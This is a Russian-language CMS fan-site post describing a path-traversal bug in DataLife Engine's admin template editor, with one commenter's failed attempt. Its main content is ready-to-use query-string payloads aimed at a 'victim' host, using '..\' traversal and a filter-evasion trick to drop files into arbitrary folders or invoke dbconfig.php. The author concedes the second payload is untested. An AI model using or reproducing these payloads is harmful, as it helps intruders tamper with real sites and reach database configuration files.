Поиск по сайту
Вход на сайт
Обратите внимание
Топ-новости
Архив сайта
Апрель 2016 (1)
Апрель 2014 (1)
Ноябрь 2013 (1)
Октябрь 2013 (1)
Май 2013 (2)
Апрель 2013 (8)
Партнеры

seo-monster.ru - сервис проверки доменов
хочешь такой же информер? Информер ТИЦ и PR

» » DLE Баг - прямой вызов файлов и мусор в папках

DLE Баг - прямой вызов файлов и мусор в папках

Главная

Данный баг позволяет производить прямой запуск файлов и мусорить в папках

DLE уязвимость работает на версиях: ВСЕ DLE

Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)

Автор: Lion__

Переходим по ссылке:
http://жертва/admin.php?mod=templates
Получаем юрл с хешем, дописываем:

Если вам надо расподить файлы шаблона в нужную папку:

&action=dosavetemplates&edit_main=Bag_By_Lion__&do_template=..\


Прямой запуск файлов (пример запуска dbconfig.php):
&action=dosavetemplates&do_template=..\engine/data/dbconfig.phP -a=


Внимание: Второй способ не тестировался, но должен работать, защиту вроде обходит



Ключевые теги: уязвимости dle

У вас не ставится dle модуль или dle шаблон работает не правильно? Задайте вопрос на нашем форуме по DLE(Datalife Engine CMS) и Вам обязательно помогут!



Если появились вопросы по поводу DLE Баг - прямой вызов файлов и мусор в папках или Вы хотите высказаться, то пройдите регистрацию или авторизируйтесь и оставляйте комментарии.
#1 написал: Kuzia (11 июня 2010 17:46)

Публикаций: 0
Комментариев: 0
Пробовал. Если втавить строку
&action=dosavetemplates&do_template=..
engine/data/dbconfig.phP -a=

то пишет что файл не найден, а если
&action=dosavetemplates&do_template=..
engine/data/dbconfig.php

то Hacking attemp
Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Вверх